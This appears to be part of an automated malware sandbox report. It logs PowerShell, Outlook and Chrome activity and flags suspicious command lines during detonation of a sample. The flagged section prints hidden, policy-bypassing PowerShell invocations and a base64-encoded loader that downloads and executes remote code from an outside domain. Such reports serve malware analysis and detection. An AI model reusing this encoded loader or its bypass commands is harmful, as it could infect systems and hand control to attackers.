              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSB
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
